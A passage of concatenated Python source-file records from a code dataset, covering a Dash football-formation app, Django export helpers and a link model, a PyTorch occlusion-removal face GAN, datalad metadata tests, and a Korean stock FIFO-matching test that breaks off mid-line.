'figure'),\r\n\t[dash.dependencies.Input('submit', 'n_clicks')],\r\n\t[dash.dependencies.State('Game_for_Formation', 'value'),\r\n\tdash.dependencies.State('Player', 'value'),\r\n\tdash.dependencies.State('X_slider', 'value'),\r\n\tdash.dependencies.State('Y_slider', 'value'),\r\n\tdash.dependencies.State('Clo_slider', 'value'),\r\n\tdash.dependencies.State('Bet_slider', 'value')])\r\ndef update_graph_Field(click,game,player1,X,Y,C,B):\r\n\ttitle = 'New Formation'\r\n\tglobal ML\r\n\tplotter = pitch.Plotter(title)\r\n\ttemp_frame = original_data.iloc[game]\r\n\tfor i in range(1,12):\r\n\t\tplayer=[temp_frame['X%s' %i],temp_frame['Y%s' %i],\\\r\n\t\t'Player %s' %i,15]\r\n\t\tML[i-1]=[temp_frame['C%s' %i],temp_frame['B%s' %i],temp_frame['X%s' %i],temp_frame['Y%s' %i]]\r\n\t\told_form[i]=player\r\n\tif click==0:\r\n\t\tplotter.add_events_dict(old_form,u'Black')\r\n\t\tdata, layout = plotter.plot()\r\n\t\treturn {'data': data, 'layout': layout}\r\n\r\n\tif click>0:\r\n\t\tname='Player %s' %player1\r\n\t\tplayer = [X,Y,name,15]\r\n\t\tML[player1-1] = [C,B,X,Y]\r\n\t\tdemo_dict[player1]=player\r\n\t\t[old_form.pop(key) for key in list(demo_dict.keys())] \r\n\t\tplotter.add_events_dict(demo_dict,u'Red')\r\n\tplotter.add_events_dict(old_form,u'Black')\r\n\tdata, layout = plotter.plot()\r\n\treturn {'data': data, 'layout': layout}\r\n\r\n@app.callback(\r\n\tdash.dependencies.Output('print', 'children'),\r\n\t[dash.dependencies.Input(\"submit_team\", 'n_clicks')])\r\ndef update_output(clicks):\r\n\tif any(len(elem) is 0 for elem in ML) & clicks>0:\r\n\t\treturn 'Please submit 11 players first'\r\n\tClose, Between, X, Y = zip(*ML)\r\n\tClose=np.asarray(Close)\r\n\tBetween=np.asarray(Between)\r\n\tX=np.asarray(X)\r\n\tY=np.asarray(Y)\r\n\tdata = np.concatenate((Close,Between,X,Y),axis=None).T\r\n\ta=logreg.predict([data])[0]\r\n\treturn str(a)\t\r\n\r\n","sub_path":"Interactive application/apps/Toy_Example.py","file_name":"Toy_Example.py","file_ext":"py","file_size_in_byte":9076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"125914726","text":"import xlwt\nimport csv\nimport pandas as pd\nfrom io import BytesIO, StringIO\nfrom django.http import HttpResponse\nfrom django.utils.encoding import smart_str\n\ndef export_to_xls(data,file_name,sheet_name,columns):\n print(columns,'cc',file_name,sheet_name,data)\n response = HttpResponse(content_type='application/ms-excel')\n response['Content-Disposition'] = 'attachment; filename='+file_name\n\n wb = xlwt.Workbook(encoding='utf-8')\n ws = wb.add_sheet(sheet_name)\n\n # Sheet header, first row\n row_num = 0\n\n font_style = xlwt.XFStyle()\n font_style.font.bold = True\n print(columns,'c--')\n columns = columns\n\n for col_num in range(len(columns)):\n ws.write(row_num, col_num, columns[col_num], font_style)\n\n # Sheet body, remaining rows\n font_style = xlwt.XFStyle()\n\n rows = data\n for row in rows:\n row_num = row_num + 1\n print(row,'ro')\n ws.write(row_num, 0, row['row'], font_style)\n ws.write(row_num, 1, row['column name'], font_style)\n ws.write(row_num, 2, row['message'], font_style)\n # ws.write(row_num, 3, row.notes, font_style) \n\n wb.save(response)\n return response\n\n\ndef export_to_csv(data,file_name,columns):\n print('csv')\n response = HttpResponse(content_type='text/csv')\n\t#decide the file name\n response['Content-Disposition'] = 'attachment; filename='+file_name\n\n writer = csv.writer(response, csv.excel)\n response.write(u'\\ufeff'.encode('utf8'))\n\n\t#write the headers\n writer.writerow([\n\t\tsmart_str(u\"row\"),\n\t\tsmart_str(u\"column name\"),\n\t\tsmart_str(u\"message\"),\n\t])\n\t#get data from database or from text file....\n events = data #dummy function to fetch data\n for event in events:\n print(events,'eeee')\n writer.writerow([\n\t\t\tsmart_str(event['row']),\n\t\t\tsmart_str(event['column name']),\n\t\t\tsmart_str(event['message'])\n\t\t])\n return response\n\n\ndef export_to_excel_by_io(data,sheet_name):\n sio = BytesIO()\n pd_df = pd.DataFrame(data)\n pdwrt = pd.ExcelWriter(sio, engine='xlsxwriter') \n pd_df.to_excel(pdwrt, sheet_name=sheet_name)\n pdwrt.save()\n sio.seek(0)\n workbook = sio.getvalue()\n response = HttpResponse(workbook, content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n # set the file name in the Content-Disposition header\n response['Content-Disposition'] = 'attachment; filename=myError.xlsx'\n return response","sub_path":"file_export/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"149406506","text":"from django.db import models\nfrom homework.models import Homework\nfrom classlists.models import Klass\n\nfrom datetime import date\n\nSUBJECT_CHOICES = (\n ('Language','Language'),\n ('Math','Math'),\n ('Science','Science'),\n ('French','French'),\n ('Visual Art','Visual Art'),\n ('Phys Ed.','Phys Ed.'),\n ('Geography','Geography'),\n ('History','History'),\n ('Drama','Drama'),\n ('Dance','Dance'),\n ('Media','Media'), \n ('Music','Music'), \n ('Health','Health'),\n ('Library','Library'),\n ('Misc','Misc.'),\n )\n \nclass Link(models.Model):\n\tlink=models.URLField()\n\tdescription=models.CharField(max_length=30)\n\thomework=models.ForeignKey(Homework, blank=True, null=True)\n\tklass=models.ManyToManyField(Klass, blank=False)\n\tsubject=models.CharField(max_length=10,choices=SUBJECT_CHOICES, blank=True, null=True)\n\t\n\tdef __unicode__(self):\n\t\treturn '%s %s' %(self.description, self.link)\n\n","sub_path":"links/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"640120244","text":"import os\nimport numpy as np\nfrom collections import OrderedDict\nimport math\nimport matplotlib\n\nimport matplotlib.pyplot as plt\nimport PIL.Image as Image\n\nimport torch\n\nfrom models.base_model import BaseModel\nfrom models.modules.base_module import ModuleFactory\nimport utils.util as util\nfrom models.modules.vgg import VGG16FeatureExtractor\n\n\nclass FOAFCGAN_alternate_training(BaseModel):\n\n def __init__(self, opt):\n\n super(FOAFCGAN_alternate_training, self).__init__(opt)\n\n self._name = 'FOAFCGAN_alternate_training_1'\n\n self._init_create_networks()\n\n if self._is_train:\n self._init_train_vars()\n\n if not self._is_train or self._opt.load_epoch > 0:\n self.load()\n\n self._init_prefetch_inputs()\n\n self._init_losses()\n \n\n def _init_create_networks(self):\n\n self._G = self._create_generator()\n self._G.init_weights()\n self._G = torch.nn.DataParallel(self._G, device_ids=[0])\n\n self._D = self._create_discriminator()\n self._D.init_weights()\n self._D = torch.nn.DataParallel(self._D, device_ids=[0])\n\n self._vgg = VGG16FeatureExtractor()\n self._vgg = torch.nn.DataParallel(self._vgg, device_ids=[0])\n\n def _create_generator(self):\n return ModuleFactory.get_by_name('generator_wgan')\n\n def _create_discriminator(self):\n return ModuleFactory.get_by_name('discriminator_wgan_cls')\n\n def _init_train_vars(self):\n\n self._current_lr_G = self._opt.lr_G\n self._current_lr_D = self._opt.lr_D\n\n self._optimizer_G = torch.optim.Adam(self._G.parameters(), lr=self._current_lr_G,\n betas=[self._opt.G_adam_b1, self._opt.G_adam_b2])\n self._optimizer_D = torch.optim.Adam(self._D.parameters(), lr=self._current_lr_D,\n betas=[self._opt.D_adam_b1, self._opt.D_adam_b2])\n\n def _init_prefetch_inputs(self):\n\n self._input_img_occ = \\\n self._Tensor(self._opt.batch_size, 3, self._opt.image_size, self._opt.image_size)\n self._input_occ_attr = \\\n self._Tensor(self._opt.batch_size, self._opt.attr_nc)\n\n self._input_img_none_occ = \\\n self._Tensor(self._opt.batch_size, 3, self._opt.image_size, self._opt.image_size)\n self._input_none_occ_attr = \\\n self._Tensor(self._opt.batch_size, self._opt.attr_nc)\n\n self._input_img_none_occ_adv = \\\n self._Tensor(self._opt.batch_size, 3, self._opt.image_size, self._opt.image_size)\n self._input_none_occ_attr_adv = \\\n self._Tensor(self._opt.batch_size, self._opt.attr_nc)\n\n def _init_losses(self):\n\n self._compute_loss_l1 = torch.nn.L1Loss()\n self._compute_loss_attr = torch.nn.MSELoss()\n\n # real and fake occluded face image loss\n self._loss_g_mask = self._Tensor([0])\n self._loss_g_masked_fake = self._Tensor([0])\n self._loss_g_mask_smooth = self._Tensor([0])\n # self._loss_g_mask_hash = self._Tensor([0])\n self._loss_g_attr = self._Tensor([0])\n self._loss_g_synth_smooth = self._Tensor([0])\n\n # fake occluded face image loss\n self._loss_g_vaild = self._Tensor([0])\n self._loss_g_hole = self._Tensor([0])\n self._loss_g_perceptual = self._Tensor([0])\n self._loss_g_style = self._Tensor([0])\n\n # d loss\n self._loss_d_attr = self._Tensor([0])\n self._loss_d_real = self._Tensor([0])\n self._loss_d_fake = self._Tensor([0])\n self._loss_d_gp = self._Tensor([0])\n\n def set_input(self, input):\n\n self._input_img_occ.resize_(input['occ_img'].size()).copy_(input['occ_img'])\n self._input_img_none_occ.resize_(input['none_occ_img'].size()).copy_(input['none_occ_img'])\n self._input_img_none_occ_adv.resize_(\n input['none_occ_img_adv'].size()).copy_(input['none_occ_img_adv'])\n\n if input['occ_attr'] is not None:\n self._input_occ_attr.resize_(\n input['occ_attr'].size()).copy_(input['occ_attr'])\n \n if input['none_occ_attr'] is not None:\n self._input_none_occ_attr.resize_(\n input['none_occ_attr'].size()).copy_(input['none_occ_attr'])\n\n if input['none_occ_attr_adv'] is not None:\n self._input_none_occ_attr_adv.resize_(\n input['none_occ_attr_adv'].size()).copy_(input['none_occ_attr_adv'])\n\n self._input_img_occ = self._input_img_occ.to(self._device)\n self._input_img_none_occ = self._input_img_none_occ.to(self._device)\n self._input_img_none_occ_adv = self._input_img_none_occ_adv.to(self._device)\n \n\n self._input_occ_attr = self._input_occ_attr.to(self._device)\n self._input_none_occ_attr = self._input_none_occ_attr.to(self._device)\n self._input_none_occ_attr_adv = self._input_none_occ_attr_adv.to(self._device)\n\n def set_train(self):\n\n self._G.train()\n self._D.train()\n self._is_train = True\n\n def set_eval(self):\n\n self._G.eval()\n self._is_train = False\n\n\n def forward(self, keep_data_for_visuals=False):\n\n if not self._is_train:\n\n im_occ = self._input_img_occ\n\n fake_img, fake_img_mask = self._G.forward(im_occ)\n fake_img_synthesis = fake_img_mask * im_occ + (1 - fake_img_mask) * fake_img\n\n if keep_data_for_visuals:\n\n self._vis_batch_occ_img = util.tensor2im(im_occ, idx=-1)\n self._vis_batch_fake_img = util.tensor2im(fake_img.data, idx=-1)\n self._vis_batch_fake_img_mask = util.tensor2maskim(fake_img_mask.data, idx=-1)\n self._vis_batch_fake_synthesis = util.tensor2im(fake_img_synthesis.data, idx=-1)\n self._vis_batch_none_occ_img = util.tensor2im(self._input_img_none_occ, idx=-1)\n\n\n def optimize_parameters(self, train_generator=True, keep_data_for_visuals=False, has_GT=False, has_attr=False):\n \n if self._is_train:\n self._B = self._input_img_occ.size(0)\n self._img_occ = self._input_img_occ\n self._img_none_occ = self._input_img_none_occ\n self._img_none_occ_adv = self._input_img_none_occ_adv\n\n self._none_occ_attr = self._input_none_occ_attr\n self._occ_attr = self._input_occ_attr\n self._occ_attr_adv = self._input_none_occ_attr_adv\n\n loss_D, fake_img_synthesis = self._forward_D(has_attr)\n self._optimizer_D.zero_grad()\n loss_D.backward()\n self._optimizer_D.step()\n\n loss_D_gp = self._gradinet_penalty_D(fake_img_synthesis)\n self._optimizer_D.zero_grad()\n loss_D_gp.backward()\n self._optimizer_D.step()\n\n if train_generator:\n loss_G = self._forward_G(keep_data_for_visuals, has_GT, has_attr)\n self._optimizer_G.zero_grad()\n loss_G.backward()\n self._optimizer_G.step()\n\n def _forward_G(self, keep_data_for_visuals, has_GT, has_attr):\n\n fake_img, fake_img_mask = self._G.forward(self._img_occ)\n fake_img_synthesis = fake_img_mask * self._img_occ + (1 - fake_img_mask) * fake_img\n\n if has_GT == True:\n\n fake_img_synthesis_feature = self._vgg(fake_img_synthesis)\n fake_img_feature = self._vgg(fake_img)\n gt_img_feature = self._vgg(self._img_none_occ)\n\n style = 0\n perceptual = 0\n\n for i in range(3):\n\n style += self._compute_loss_l1(self._compute_loss_gram_matrix(fake_img_feature[i]), \n self._compute_loss_gram_matrix(gt_img_feature[i]))\n style += self._compute_loss_l1(self._compute_loss_gram_matrix(fake_img_synthesis_feature[i]), \n self._compute_loss_gram_matrix(gt_img_feature[i]))\n\n perceptual += self._compute_loss_l1(fake_img_feature[i], gt_img_feature[i]) \n perceptual += self._compute_loss_l1(fake_img_synthesis_feature[i], gt_img_feature[i])\n\n self._loss_g_style = style * self._opt.lambda_g_style\n self._loss_g_perceptual = perceptual * self._opt.lambda_g_perceptual\n\n target = (1 - fake_img_mask) * self._img_none_occ\n target = target.detach()\n self._loss_g_hole = self._compute_loss_l1((1 - fake_img_mask) * fake_img, target) * self._opt.lambda_g_hole\n \n target = fake_img_mask * self._img_none_occ\n target = target.detach()\n self._loss_g_vaild = self._compute_loss_l1(fake_img_mask * fake_img, target) * self._opt.lambda_g_valid\n \n # self._loss_g_mask_hash = -0.5 * torch.abs(fake_img_mask - 0.5).mean() * self._opt.lambda_g_hash\n\n d_fake_img_synthesis_prob, d_fake_img_attr = self._D.forward(fake_img_synthesis)\n \n if has_attr == True:\n self._loss_g_attr = self._compute_loss_attr(d_fake_img_attr, self._occ_attr) / self._B * self._opt.lambda_D_attr\n\n self._loss_g_synthesis_fake = self._compute_loss_D(d_fake_img_synthesis_prob, True) * self._opt.lambda_D_prob\n self._loss_g_mask = -torch.mean(fake_img_mask).pow(2) * self._opt.lambda_mask\n self._loss_g_mask_smooth = self._compute_loss_smooth(fake_img_mask) * self._opt.lambda_mask_smooth\n self._loss_g_synth_smooth = self._compute_loss_smooth(fake_img_synthesis) * self._opt.lambda_g_syhth_smooth\n \n if keep_data_for_visuals:\n\n self._vis_batch_occ_img = util.tensor2im(self._input_img_occ, idx=-1)\n self._vis_batch_fake_img = util.tensor2im(fake_img.data, idx=-1)\n self._vis_batch_fake_img_mask = util.tensor2maskim(fake_img_mask.data, idx=-1)\n self._vis_batch_fake_synthesis = util.tensor2im(fake_img_synthesis.data, idx=-1)\n self._vis_batch_none_occ_img = util.tensor2im(self._input_img_none_occ, idx=-1)\n\n if has_GT == True and has_attr == True:\n return self._loss_g_synthesis_fake + self._loss_g_mask + \\\n self._loss_g_mask_smooth + self._loss_g_synth_smooth +\\\n self._loss_g_vaild + self._loss_g_hole + \\\n self._loss_g_perceptual + self._loss_g_style + \\\n self._loss_g_attr # + self._loss_g_mask_hash + \\\n\n elif has_GT == False and has_attr == True:\n return self._loss_g_synthesis_fake + self._loss_g_mask + \\\n self._loss_g_mask_smooth + self._loss_g_synth_smooth +\\\n self._loss_g_attr # + self._loss_g_mask_hash\n\n elif has_GT == False and has_attr == False:\n return self._loss_g_synthesis_fake + self._loss_g_mask + \\\n self._loss_g_mask_smooth + self._loss_g_synth_smooth \n #+ self._loss_g_mask_hash\n else:\n raise NotImplementedError('Not existing has_GT = False and has_attr = True')\n return None\n\n def _forward_D(self, has_attr):\n\n d_real_img_prob, d_real_img_attr = self._D.forward(self._img_none_occ_adv)\n\n self._loss_d_real = self._compute_loss_D(d_real_img_prob, True) * self._opt.lambda_D_prob\n \n if has_attr:\n self._loss_d_attr = \\\n self._compute_loss_attr(d_real_img_attr, \n self._occ_attr_adv) / self._B * self._opt.lambda_D_attr\n\n\n fake_img, fake_img_mask = self._G.forward(self._img_occ)\n fake_img_synthesis = fake_img_mask * self._img_occ + (1 - fake_img_mask) * fake_img\n\n d_fake_img_prob, _ = self._D.forward(fake_img_synthesis.detach())\n self._loss_d_fake = self._compute_loss_D(d_fake_img_prob, False) * self._opt.lambda_D_prob\n\n if has_attr:\n return self._loss_d_real + self._loss_d_fake + self._loss_d_attr, fake_img_synthesis\n else:\n return self._loss_d_real + self._loss_d_fake, fake_img_synthesis\n\n\n def _gradinet_penalty_D(self, fake_img_synthesis):\n\n alpha = torch.rand(self._B, 1, 1, 1).expand_as(self._img_none_occ_adv).to(self._device)\n interpolated = alpha * self._img_none_occ_adv.data + (1 - alpha) * fake_img_synthesis.data\n interpolated.requires_grad = True\n interpolated_prob, _ = self._D(interpolated)\n\n grad = torch.autograd.grad(outputs=interpolated_prob,\n inputs=interpolated,\n grad_outputs=torch.ones(interpolated_prob.size()).to(self._device),\n retain_graph=True,\n create_graph=True,\n only_inputs=True)[0]\n\n grad = grad.view(grad.size(0), -1)\n grad_l2norm = torch.sqrt(torch.sum(grad ** 2, dim=1))\n self._loss_d_gp = torch.mean((grad_l2norm - 1) ** 2) * self._opt.lambda_D_gp\n\n return self._loss_d_gp\n\n def _compute_loss_D(self, estim, is_real):\n \n return -torch.mean(estim) if is_real else torch.mean(estim)\n\n def _compute_loss_smooth(self, mat):\n\n return torch.sum(torch.abs(mat[:, :, :, :-1] - mat[:, :, :, 1:])) + \\\n torch.sum(torch.abs(mat[:, :, :-1, :] - mat[:, :, 1:, :]))\n\n def _compute_loss_gram_matrix(self, feat):\n\n (b, ch, h, w) = feat.size()\n feat = feat.view(b, ch, h * w)\n feat_t = feat.transpose(1, 2)\n gram = torch.bmm(feat, feat_t) / (ch * h * w)\n return gram\n\n\n def get_current_errors(self, has_GT, has_attr):\n\n if has_GT == True and has_attr == True:\n loss_dict = OrderedDict([('g_mskd_fake', self._loss_g_synthesis_fake.item()),\n ('g_m_mean', self._loss_g_mask.item()),\n ('g_m_smooth', self._loss_g_mask_smooth.item()),\n # ('g_m_hash', self._loss_g_mask_hash.item()),\n ('g_generate_face_smooth', self._loss_g_synth_smooth.item()),\n ('g_attr', self._loss_g_attr),\n ('g_generate_face_vaild', self._loss_g_vaild.item()),\n ('g_generate_face_hole', self._loss_g_hole.item()),\n ('g_generate_face_perceptual', self._loss_g_perceptual.item()),\n ('g_generate_face_style', self._loss_g_style.item()),\n ('d_real', self._loss_d_real.item()),\n ('d_fake', self._loss_d_fake.item()),\n ('d_gp', self._loss_d_gp.item()),\n ('d_attr', self._loss_d_attr)\n ])\n elif has_GT == False and has_attr == True:\n loss_dict = OrderedDict([('g_mskd_fake', self._loss_g_synthesis_fake.item()),\n ('g_m_mean', self._loss_g_mask.item()),\n ('g_m_smooth', self._loss_g_mask_smooth.item()),\n # ('g_m_hash', self._loss_g_mask_hash.item()),\n ('g_generate_face_smooth', self._loss_g_synth_smooth.item()),\n ('g_attr', self._loss_g_attr),\n ('d_real', self._loss_d_real.item()),\n ('d_fake', self._loss_d_fake.item()),\n ('d_gp', self._loss_d_gp.item()),\n ('d_attr', self._loss_d_attr)\n ])\n\n elif has_GT == False and has_attr == False:\n loss_dict = OrderedDict([('g_mskd_fake', self._loss_g_synthesis_fake.item()),\n ('g_m_mean', self._loss_g_mask.item()),\n ('g_m_smooth', self._loss_g_mask_smooth.item()),\n # ('g_m_hash', self._loss_g_mask_hash.item()),\n ('g_generate_face_smooth', self._loss_g_synth_smooth.item()),\n ('d_real', self._loss_d_real.item()),\n ('d_fake', self._loss_d_fake.item()),\n ('d_gp', self._loss_d_gp.item()),\n ])\n else:\n raise NotImplementedError('Not existing has_GT = False and has_attr = True')\n\n return loss_dict\n\n def get_current_scalars(self):\n\n return OrderedDict([('lr_G', self._current_lr_G), ('lr_D', self._current_lr_D)])\n\n def get_current_visuals(self):\n\n visuals = OrderedDict()\n visuals['1_batch_occ_img'] = self._vis_batch_occ_img\n visuals['2_batch_fake_img'] = self._vis_batch_fake_img\n visuals['3_batch_fake_img_mask'] = self._vis_batch_fake_img_mask\n visuals['4_batch_fake_img_synthesis'] = self._vis_batch_fake_synthesis\n visuals['5_batch_none_occ_img'] = self._vis_batch_none_occ_img\n\n return visuals\n\n def save(self, label):\n\n self._save_network(self._G, 'G', label)\n self._save_network(self._D, 'D', label)\n\n self._save_optimizer(self._optimizer_G, 'G', label)\n self._save_optimizer(self._optimizer_D, 'D', label)\n\n def load(self):\n\n load_epoch = self._opt.load_epoch\n\n self._load_network(self._G, 'G', load_epoch)\n\n if self._is_train:\n\n self._load_network(self._D, 'D', load_epoch)\n self._load_optimizer(self._optimizer_G, 'G', load_epoch)\n self._load_optimizer(self._optimizer_D, 'D', load_epoch)\n\n\n def update_learning_rate(self):\n\n lr_decay_G = self._opt.lr_G / self._opt.nepochs_decay\n self._current_lr_G -= lr_decay_G\n for param_group in self._optimizer_G.param_groups:\n param_group['lr'] = self._current_lr_G\n print('update G learning rate: %f -> %f' % (self._current_lr_G + lr_decay_G, self._current_lr_G))\n\n lr_decay_D = self._opt.lr_D / self._opt.nepochs_decay\n self._current_lr_D -= lr_decay_D\n for param_group in self._optimizer_D.param_groups:\n param_group['lr'] = self._current_lr_D\n print('update D learning rate: %f -> %f' % (self._current_lr_D + lr_decay_D, self._current_lr_D))\n","sub_path":"models/FOAFCGAN_alternate_training_1.py","file_name":"FOAFCGAN_alternate_training_1.py","file_ext":"py","file_size_in_byte":18162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"255949984","text":"# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test meta data \"\"\"\n\nfrom six import PY2\nfrom datalad.api import Dataset, aggregate_metadata\nfrom datalad.metadata import get_metadata_type, get_metadata\nfrom nose.tools import assert_true, assert_equal, assert_raises\nfrom datalad.tests.utils import with_tree, with_tempfile\nfrom datalad.utils import chpwd\nimport os\nfrom os.path import join as opj\nfrom datalad.support.exceptions import InsufficientArgumentsError\nfrom nose import SkipTest\n\n\n_dataset_hierarchy_template = {\n 'origin': {\n 'dataset_description.json': \"\"\"\n{\n \"Name\": \"mother_äöü東\"\n}\"\"\",\n 'datapackage.json': \"\"\"\n{\n \"name\": \"MOTHER_äöü東\",\n \"keywords\": [\"example\", \"multitype metadata\"]\n}\"\"\",\n 'sub': {\n 'dataset_description.json': \"\"\"\n{\n \"Name\": \"child_äöü東\"\n}\"\"\",\n 'subsub': {\n 'dataset_description.json': \"\"\"\n{\n \"Name\": \"grandchild_äöü東\"\n}\"\"\"}}}}\n\n\n@with_tempfile(mkdir=True)\ndef test_get_metadata_type(path):\n # nothing set, nothing found\n assert_equal(get_metadata_type(Dataset(path)), None)\n os.makedirs(opj(path, '.datalad'))\n # got section, but no setting\n open(opj(path, '.datalad', 'config'), 'w').write('[metadata]\\n')\n assert_equal(get_metadata_type(Dataset(path)), None)\n # minimal setting\n open(opj(path, '.datalad', 'config'), 'w+').write('[metadata]\\nnativetype = mamboschwambo\\n')\n assert_equal(get_metadata_type(Dataset(path)), ['mamboschwambo'])\n\n\n@with_tree(tree={\n 'dataset_description.json': \"{}\",\n 'datapackage.json': '{\"name\": \"some\"}'\n})\ndef test_get_multiple_metadata_types(path):\n assert_equal(\n sorted(get_metadata_type(Dataset(path), guess=True)),\n ['bids', 'frictionless_datapackage'])\n\n\n@with_tree(tree={\n 'origin': {\n 'dataset_description.json': \"\"\"\n{\n \"Name\": \"the mother\"\n}\"\"\",\n 'sub': {\n 'dataset_description.json': \"\"\"\n{\n \"Name\": \"child\"\n}\"\"\"}}})\ndef test_basic_metadata(path):\n ds = Dataset(opj(path, 'origin'))\n meta = get_metadata(ds)\n assert_equal(sorted(meta[0].keys()),\n ['@context', '@id', 'dcterms:conformsTo', 'type'])\n ds.create(force=True, save=False)\n # with subdataset\n sub = ds.create('sub', force=True, if_dirty='ignore')\n ds.save()\n meta = get_metadata(ds)\n assert_equal(\n sorted(meta[0].keys()),\n ['@context', '@id', 'availableFrom', 'dcterms:conformsTo',\n 'dcterms:hasPart', 'dcterms:modified', 'type', 'version'])\n assert_equal(meta[0]['type'], 'Dataset')\n # clone and get relationship info in metadata\n sibling = Dataset(opj(path, 'sibling'))\n sibling.install(source=opj(path, 'origin'))\n sibling_meta = get_metadata(sibling)\n assert_equal(sibling_meta[0]['@id'], ds.id)\n # origin should learn about the clone\n sibling.repo.push(remote='origin', refspec='git-annex')\n meta = get_metadata(ds)\n assert_equal([m['@id'] for m in meta[0]['availableFrom']],\n [m['@id'] for m in sibling_meta[0]['availableFrom']])\n meta = get_metadata(ds, guess_type=True)\n assert_equal(meta[0]['dcterms:hasPart'],\n {'@id': sub.id,\n 'type': 'Dataset',\n 'location': 'sub'})\n\n\n@with_tree(tree=_dataset_hierarchy_template)\ndef test_aggregation(path):\n with chpwd(path):\n assert_raises(InsufficientArgumentsError, aggregate_metadata, None)\n # a hierarchy of three (super/sub)datasets, each with some native metadata\n ds = Dataset(opj(path, 'origin')).create(force=True)\n subds = ds.create('sub', force=True, if_dirty='ignore')\n subsubds = subds.create('subsub', force=True, if_dirty='ignore')\n # aggregate from bottom to top, guess native data, no compacting of graph\n # should yield 6 meta data sets, one implicit, and one native per dataset\n # and a second natiev set for the topmost dataset\n aggregate_metadata(ds, guess_native_type=True, recursive=True)\n # no only ask the top superdataset, no recursion, just reading from the cache\n meta = get_metadata(\n ds, guess_type=False, ignore_subdatasets=False, ignore_cache=False)\n assert_equal(len(meta), 7)\n # same schema\n assert_equal(\n 7, sum([s.get('@context', None) == 'http://schema.org/' for s in meta]))\n # three different IDs\n assert_equal(3, len(set([s.get('@id') for s in meta])))\n # and we know about all three datasets\n for name in ('mother_äöü東', 'child_äöü東', 'grandchild_äöü東'):\n if PY2:\n assert_true(sum([s.get('name', None) == name.decode('utf-8') for s in meta]))\n else:\n assert_true(sum([s.get('name', None) == name for s in meta]))\n assert_equal(\n meta[0]['dcterms:hasPart']['@id'],\n subds.id)\n success = False\n for m in meta:\n p = m.get('dcterms:hasPart', {})\n if p.get('@id', None) == subsubds.id:\n assert_equal(opj('sub', 'subsub'), p.get('location', None))\n success = True\n assert_true(success)\n\n # save the toplevel dataset only (see below)\n ds.save('with aggregated meta data', auto_add_changes=True)\n\n # now clone the beast to simulate a new user installing an empty dataset\n clone = Dataset(opj(path, 'clone'))\n clone.install(source=ds.path)\n # ID mechanism works\n assert_equal(ds.id, clone.id)\n\n # get fresh meta data, the implicit one for the top-most datasets should\n # differ, but the rest not\n clonemeta = get_metadata(\n clone, guess_type=False, ignore_subdatasets=False, ignore_cache=False)\n\n # make sure the implicit md for the topmost come first\n assert_equal(clonemeta[0]['@id'], clone.id)\n assert_equal(clonemeta[0]['@id'], ds.id)\n assert_equal(clonemeta[0]['version'], ds.repo.get_hexsha())\n # all but the implicit is identical\n assert_equal(clonemeta[1:], meta[1:])\n # the implicit md of the clone should list a dataset ID for its subds,\n # although it has not been obtained!\n assert_equal(\n clonemeta[0]['dcterms:hasPart']['@id'],\n subds.id)\n\n # now obtain a subdataset in the clone and the IDs should be updated\n clone.install('sub')\n partial = get_metadata(clone, guess_type=False, ignore_cache=True)\n # ids don't change\n assert_equal(partial[0]['@id'], clonemeta[0]['@id'])\n # datasets are properly connected\n assert_equal(partial[0]['dcterms:hasPart']['@id'],\n partial[1]['@id'])\n\n # query smoke test\n try:\n if os.environ.get('DATALAD_TESTS_NONETWORK'):\n raise SkipTest\n\n import pyld\n from datalad.api import search_datasets\n\n res = list(clone.search_datasets('.*'))\n assert_equal(len(res), 3) # one per dataset\n assert_equal(len(list(clone.search_datasets('grandchild.*'))), 1)\n\n # do here to prevent pyld from being needed\n except SkipTest:\n raise SkipTest\n except ImportError:\n raise SkipTest\n except pyld.jsonld.JsonLdError as e:\n if PY2:\n raise e\n # pyld code is not ready for Python 3.5 it seems (see: #756)\n pass\n\n #TODO update the clone or reclone to check whether saved meta data comes down the pipe\n","sub_path":"datalad/metadata/tests/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":7553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"174364593","text":"from datetime import datetime\nfrom base.transaction import BulkTransaction\nfrom base.tests import BaseNoTransactionTestCase\nfrom stock.importers import 유안타증권Importer\nfrom stock.logics import StockExcelConvertLogic, FIFOMatchingLogic\nfrom stock.models.models import BuyingStocks, SellingStocks, FifoSellingBuyingStocksMapping, StockAccount, \\\n TradingStocks, StockHolder\n\n\nclass 유안타증권FIFOMatchTest2(BaseNoTransactionTestCase):\n def setUp(self):\n with BulkTransaction():\n stock_holder = StockHolder.objects.create(name='이현수')\n importer = 유안타증권Importer(path='stock/tests/data/이현수/유안타증권/이현수_유안타증권_111-111-11111.xlsx', stock_holder=stock_holder)\n importer.do()\n logic = StockExcelConvertLogic(stock_holder)\n logic.do()\n stock_account = StockAccount.objects.get(account_number='111-111-11111')\n fifo_matching_logic = FIFOMatchingLogic(stock_account=stock_account)\n fifo_matching_logic.do()\n\n def test(self):\n buying_date1 = datetime.strptime('2014/11/03', '%Y/%m/%d')\n selling_date1 = datetime.strptime('2014/11/05', '%Y/%m/%d')\n\n buying_stock1 = BuyingStocks.objects.get(trading_date=buying_date1, sequence=25)\n selling_stock1 = SellingStocks.objects.get(trading_date=selling_date1, sequence=3)\n assert buying_stock1.fifo_unmapping_count == 6889\n assert selling_stock1.fifo_unmapping_count == 0\n\n mapping_instance_list = list(FifoSellingBuyingStocksMapping.objects.filter(S=selling_stock1))\n assert mapping_instance_list[-1].T.fifo_unmapping_count == 6889\n assert sum([mapping.T.fifo_unmapping_count for mapping in mapping_instance_list[:-1]]) == 0\n\n last_buying 